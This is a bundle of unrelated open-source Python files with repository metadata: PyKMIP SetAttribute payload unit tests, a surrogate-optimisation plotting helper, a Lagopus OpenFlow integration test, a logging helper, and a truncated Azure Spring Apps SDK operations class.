args = (self.empty_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The SetAttribute request payload encoding is missing the "
"new attribute field.",
payload.read,
*args
)
def test_read_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to decode the SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
args = (self.empty_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.read,
*args,
**kwargs
)
def test_write(self):
"""
Test that a SetAttribute request payload can be written to a buffer.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.full_encoding), len(buffer))
self.assertEqual(str(self.full_encoding), str(buffer))
def test_write_no_unique_identifier(self):
"""
Test that a SetAttribute request payload can be written to a buffer
without the unique identifier field.
"""
payload = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.no_unique_identifier_encoding), len(buffer))
self.assertEqual(str(self.no_unique_identifier_encoding), str(buffer))
def test_write_no_new_attribute(self):
"""
Test that an InvalidField error is raised when attempting to write
a SetAttribute request payload to a buffer with no new attribute
field specified.
"""
payload = payloads.SetAttributeRequestPayload()
args = (utils.BytearrayStream(), )
self.assertRaisesRegex(
exceptions.InvalidField,
"The SetAttribute request payload is missing the new attribute "
"field.",
payload.write,
*args
)
def test_write_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to encode the SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
args = (utils.BytearrayStream(), )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.write,
*args,
**kwargs
)
def test_repr(self):
"""
Test that repr can be applied to a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=None
)
args = [
"unique_identifier='b4faee10-aa2a-4446-8ad4-0881f3422959'",
"new_attribute=None"
]
self.assertEqual(
"SetAttributeRequestPayload({})".format(", ".join(args)),
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=None
)
s = str(
{
"unique_identifier": "b4faee10-aa2a-4446-8ad4-0881f3422959",
"new_attribute": None
}
)
self.assertEqual(s, str(payload))
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two SetAttribute request payloads with the same data.
"""
a = payloads.SetAttributeRequestPayload()
b = payloads.SetAttributeRequestPayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
b = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_unique_identifiers(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute request payloads with different unique
identifiers.
"""
a = payloads.SetAttributeRequestPayload(unique_identifier="1")
b = payloads.SetAttributeRequestPayload(unique_identifier="2")
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_different_new_attributes(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute request payloads with different new
attributes.
"""
a = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
b = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Integer(
128,
enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
comparining a SetAttribute request payload against a different type.
"""
a = payloads.SetAttributeRequestPayload()
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
class TestSetAttributeResponsePayload(testtools.TestCase):
"""
A unit test suite for the SetAttribute response payload.
"""
def setUp(self):
super(TestSetAttributeResponsePayload, self).setUp()
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite.
#
# This encoding matches the following set of values:
# Response Payload
# Unique Identifier - b4faee10-aa2a-4446-8ad4-0881f3422959
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x30'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x62\x34\x66\x61\x65\x65\x31\x30\x2D\x61\x61\x32\x61\x2D\x34\x34'
b'\x34\x36\x2D\x38\x61\x64\x34\x2D\x30\x38\x38\x31\x66\x33\x34\x32'
b'\x32\x39\x35\x39\x00\x00\x00\x00'
)
self.empty_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x00'
)
def tearDown(self):
super(TestSetAttributeResponsePayload, self).tearDown()
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a SetAttribute response payload.
"""
kwargs = {"unique_identifier": 0}
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
payloads.SetAttributeResponsePayload,
**kwargs
)
args = (
payloads.SetAttributeResponsePayload(),
"unique_identifier",
0
)
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
setattr,
*args
)
def test_read(self):
"""
Test that a SetAttribute response payload can be read from a buffer.
"""
payload = payloads.SetAttributeResponsePayload()
self.assertIsNone(payload.unique_identifier)
payload.read(self.full_encoding)
self.assertEqual(
"b4faee10-aa2a-4446-8ad4-0881f3422959",
payload.unique_identifier
)
def test_read_no_unique_identifier(self):
"""
Test that an InvalidKmipEncoding error is raised when an invalid
encoding containing no encoded unique identifier is used to decode
a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (self.empty_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The SetAttribute response payload encoding is missing the "
"unique identifier field.",
payload.read,
*args
)
def test_read_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to decode the SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (self.empty_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.read,
*args,
**kwargs
)
def test_write(self):
"""
Test that a SetAttribute response payload can be written to a
buffer.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.full_encoding), len(buffer))
self.assertEqual(str(self.full_encoding), str(buffer))
def test_write_no_unique_identifier(self):
"""
Test that an InvalidField error is raised when attempting to write
a SetAttribute response payload to a buffer with no unique
identifier field specified.
"""
payload = payloads.SetAttributeResponsePayload()
args = (utils.BytearrayStream(), )
self.assertRaisesRegex(
exceptions.InvalidField,
"The SetAttribute response payload is missing the unique "
"identifier field.",
payload.write,
*args
)
def test_write_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to encode the SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (utils.BytearrayStream(), )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.write,
*args,
**kwargs
)
def test_repr(self):
"""
Test that repr can be applied to a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
args = [
"unique_identifier='b4faee10-aa2a-4446-8ad4-0881f3422959'"
]
self.assertEqual(
"SetAttributeResponsePayload({})".format(", ".join(args)),
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
s = str(
{
"unique_identifier": "b4faee10-aa2a-4446-8ad4-0881f3422959"
}
)
self.assertEqual(s, str(payload))
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two SetAttribute response payloads with the same data.
"""
a = payloads.SetAttributeResponsePayload()
b = payloads.SetAttributeResponsePayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
b = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_unique_identifiers(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute response payloads with different unique
identifiers.
"""
a = payloads.SetAttributeResponsePayload(unique_identifier="1")
b = payloads.SetAttributeResponsePayload(unique_identifier="2")
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
comparining a SetAttribute response payload against a different
type.
"""
a = payloads.SetAttributeResponsePayload()
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
| {
"content_hash": "5f1c9eff1aea2609d276127d99cd155b",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 79,
"avg_line_length": 34.06666666666667,
"alnum_prop": 0.5928618022551486,
"repo_name": "OpenKMIP/PyKMIP",
"id": "bb113fa9e614c5c65afc22a7a9b3544478cf752d",
"size": "22108",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/tests/unit/core/messages/payloads/test_set_attribute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5552888"
},
{
"name": "Shell",
"bytes": "1214"
}
],
"symlink_target": ""
} |
"""Plotting function for the example 2D problem.
"""
import numpy as np
import math
import utils
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
def plot(proof, slice_, grid_size, dim_limits, slice_samples_X, slice_samples_Y, past_slices, samples_X, samples_Y):
"""Plots the state after a sample evaluation round.
Figure is 2 rows and 2 columns
- First row shows 2D plots:
True function and surrogate representation with current slice.
- Second row shows 1D plots:
True function + Expected Improvement and
True function + Surrogate + Uncertainty
Surrogate representation print samples as well.
Title contains 2D as well as 1D slice test errors.
"""
prediction, uncertainty, expected_improvement = proof[0], proof[1], proof[2]
fig = plt.figure(figsize=(20, 20))
gs = gridspec.GridSpec(2, 2)
d = np.array(dim_limits).shape[1]
grid = utils.get_grid(grid_size, dim_limits)
Y = utils.six_hump_camel(grid)
grid = utils.scale_01(grid, dim_limits)
indices = np.isclose(grid[:, d-1], slice_)
grid_1D = np.linspace(0, 1, grid_size)
true_1D = Y[indices]
pred_1D = prediction[indices]
uncert_1D = uncertainty[indices]
expimp_1D = expected_improvement[indices]
xlim = (-0.01, 1.01)
# True function
ax = fig.add_subplot(gs[0], projection='3d')
ax.plot(grid_1D, np.ones(grid_size)*slice_, true_1D, 'b-', label='Current Slice', lw=2)
for i in past_slices:
indices_ = np.isclose(grid[:, d-1], i)
true_1D_ = Y[indices_]
ax.plot(grid_1D, np.ones(grid_size)*i, true_1D_, 'b--', alpha=1.0-(i/1.6), lw=2)
_ax_plot3D(ax, grid, Y, cm.Blues)
ax.scatter(samples_X[:, 0], samples_X[:, 1], samples_Y, c='r', label='Samples', s=50)
ax.set_title('Original Function')
ax.legend(loc='upper left')
# Surrogate + slice
ax = fig.add_subplot(gs[1], projection='3d')
ax.plot(grid_1D, np.ones(grid_size)*slice_, pred_1D, 'b-', label='Current Slice', lw=2)
for i in past_slices:
indices_ = np.isclose(grid[:, d-1], i)
pred_1D_ = prediction[indices_]
ax.plot(grid_1D, np.ones(grid_size)*i, pred_1D_, 'b--', alpha=1.0-(i/1.6), lw=2)
_ax_plot3D(ax, grid, prediction, cm.Greens)
ax.scatter(slice_samples_X[:, 0], slice_samples_X[:, 1], slice_samples_Y, c='r', label='Samples in Slice', s=50)
ax.set_title('Surrogate Model')
ax.legend(loc='upper left')
ax.legend(loc='lower right')
# True function + Expected Improvement
ax = fig.add_subplot(gs[2])
ax.plot(grid_1D, true_1D, 'r--', label='Original Curve')
ax.plot(grid_1D, expimp_1D/np.max(expimp_1D), '-', color='darkred', label='Expected Improvement')
ax.set_xlim(xlim)
ax.legend(loc='upper left')
# True function + Surrogate + Uncertainty
ax = fig.add_subplot(gs[3])
ax.plot(grid_1D, true_1D, 'r--', label='Original Curve')
ax.plot(grid_1D, pred_1D, 'b-', label='Surrogate Model')
ax.plot(grid_1D, uncert_1D/np.max(uncert_1D), '-', color='orange', label='Uncertainty')
ax.plot(slice_samples_X[:, 0], slice_samples_Y, 'ko', label='Samples')
ax.set_xlim(xlim)
ax.legend(loc='upper left')
plt.show()
def _ax_plot3D(ax, X, Y, cmap):
n = int(math.sqrt(X.shape[0]))
ax.plot_surface(X[:, 0].reshape(n, n), X[:, 1].reshape(n, n), Y.reshape(n, n),
cmap=cmap, alpha=0.65, rstride=2, cstride=2, linewidth=0.01, antialiased=True)
ax.set_xlabel('x1', fontsize=15)
ax.set_ylabel('x2', fontsize=15)
ax.set_zlabel('y', fontsize=15)
| {
"content_hash": "51f1ff62d090ee3b83e43659d4ab4edc",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 116,
"avg_line_length": 39.159574468085104,
"alnum_prop": 0.6310785112741103,
"repo_name": "langhabel/optimization-surrogate-generalization",
"id": "f5d1b34e84f5a9cb6a8a1e98d91de80054023d41",
"size": "3681",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/demo_visualization.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "4025292"
},
{
"name": "Python",
"bytes": "30024"
}
],
"symlink_target": ""
} |
import os
import sys
import logging
from unittest import TestCase
from nose.tools import ok_, eq_
from checker import *
class OFPTest(TestCase):
def setUp(self):
# add cleanup func.
self.addCleanup(self.cleanups)
checker_setup(self)
self.opts = checker_get_opts(self)
# start
checker_start_lagopus(self)
checker_start_datastore(self)
self.setup_ds()
checker_start_ofp(self)
def cleanups(self):
# stop
checker_stop_ofp(self)
checker_stop_datastore(self)
checker_stop_lagopus(self)
checker_teardown(self)
def setup_ds(self):
e_res = '{"ret":"OK"}'
dpid = self.opts["switches"]["target"]["dpid"]
# TODO: type = ethernet-dpdk-phy
cmds = ["channel channel01 create -dst-addr 127.0.0.1 -protocol tcp",
"controller controller01 create -channel channel01",
"interface interface01 create -type ethernet-dpdk-phy "
"-port-number 0",
"interface interface02 create -type ethernet-dpdk-phy "
"-port-number 1",
"interface interface03 create -type ethernet-dpdk-phy "
"-port-number 2",
"port port01 create -interface interface01",
"port port02 create -interface interface02",
"port port03 create -interface interface03",
"bridge bridge01 create -controller controller01 "
"-port port01 1 -port port02 2 -port port03 3 -dpid 0x1",
"bridge bridge01 enable"]
for cmd in cmds:
datastore_checker_cmd(dpid, cmd, e_res)
def test_flow(self):
dpid = self.opts["switches"]["target"]["dpid"]
dp = ofp_checker_get_dp(dpid)
ofp = dp.ofproto
ofp_parser = dp.ofproto_parser
# send FlowMod.
match = ofp_parser.OFPMatch(in_port=1, eth_dst="ff:ff:ff:ff:ff:ff")
actions = [ofp_parser.OFPActionOutput(ofp.OFPP_NORMAL, 0)]
inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,
actions)]
sm = ofp_parser.OFPFlowMod(dp, cookie=0,
cookie_mask=0,
table_id=0,
command=ofp.OFPFC_ADD,
idle_timeout=0,
hard_timeout=0,
priority=10,
buffer_id=ofp.OFP_NO_BUFFER,
out_port=0,
out_group=0,
flags=0,
match=match,
instructions=inst)
sm = ofp_checker_send_msg(dpid, sm)
# send FlowStatsRequest.
sm = ofp_parser.OFPFlowStatsRequest(dp, flags=0,
table_id=ofp.OFPTT_ALL,
out_port=ofp.OFPP_ANY,
out_group=ofp.OFPG_ANY,
cookie=0,
cookie_mask=0,
match=match)
sm = ofp_checker_send_msg(dpid, sm)
# recv FlowStatsReply.
# create expected_msg.
st = ofp_parser.OFPFlowStats(table_id=0, duration_sec=0,
duration_nsec=0, priority=10,
idle_timeout=0, hard_timeout=0, flags=0,
cookie=0, packet_count=0, byte_count=0,
match=match, instructions=inst)
st.length = 96
st._set_targets(["length", "table_id", "priority",
"idle_timeout", "hard_timeout", "flags",
"cookie", "packet_count", "byte_count",
"match", "instructions"])
em = ofp_parser.OFPFlowStatsReply(dp, body=[st],
flags=0)
em.type = ofp.OFPMP_FLOW
em, rm = ofp_checker_recv_msg(dpid, em, None,
sm.xid, 112)
# send/rcv flow datastore cmd.
e_res = '''
{"ret":"OK",
"data":[{"name":":bridge01",
"tables":[{
"flows":[{
"actions":[{
"apply_actions":[{"output":"normal"}]}],
"cookie":0,
"dl_dst":"ff:ff:ff:ff:ff:ff",
"hard_timeout":0,
"idle_timeout":0,
"in_port":1,
"priority":10}],
"table":0}]}]}
'''
datastore_checker_cmd(0x01, "flow", e_res)
| {
"content_hash": "bd1dbbf3d91005c3068d440f85bd7951",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 77,
"avg_line_length": 38.28,
"alnum_prop": 0.46018808777429465,
"repo_name": "lagopus/lagopus",
"id": "59f60ec27937d0c17df3acddf622558b606ab8ad",
"size": "4785",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/integration_test/tools/sample_nose/test_ofp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "9818181"
},
{
"name": "C++",
"bytes": "59091"
},
{
"name": "Lex",
"bytes": "644"
},
{
"name": "M4",
"bytes": "19365"
},
{
"name": "Makefile",
"bytes": "45909"
},
{
"name": "Objective-C",
"bytes": "105221"
},
{
"name": "Python",
"bytes": "264408"
},
{
"name": "Ruby",
"bytes": "7077"
},
{
"name": "Shell",
"bytes": "364911"
},
{
"name": "Yacc",
"bytes": "3875"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
def log(logger):
"""
Example:
import plpacker
import tests.helpers
tests.helpers.log(plpacker.packager.LOGGER)
"""
import logging
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(levelname)s - %(name)s - %(message)s')
handler.setFormatter(formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
| {
"content_hash": "601016a071c105727c3654b2b260e071",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 75,
"avg_line_length": 25.523809523809526,
"alnum_prop": 0.6455223880597015,
"repo_name": "digitalrounin/py-lambda-packer",
"id": "3c1f4a83c155fce2b645e350af8c54b9bf70c7aa",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69536"
}
],
"symlink_target": ""
} |
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar, Union
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._apps_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_request, build_get_resource_upload_url_request, build_list_request, build_update_request_initial, build_validate_domain_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AppsOperations:
"""AppsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.appplatform.v2021_06_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get(
self,
resource_group_name: str,
service_name: str,
app_name: str,
sync_status: Optional[str] = None,
**kwargs: Any
) -> "_models.AppResource":
"""Get an App and its properties.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param sync_status: Indicates whether sync status. Default value is None.
:type sync_status: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppResource, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
sync_status=sync_status,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> "_models.AppResource":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(app_resource, 'AppResource')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> AsyncLROPoller["_models.AppResource"]:
"""Create a new App or update an exiting App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param app_resource: Parameters for the create or update operation.
:type app_resource: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AppResource or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
app_resource=app_resource,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_delete( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Operation to delete an App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
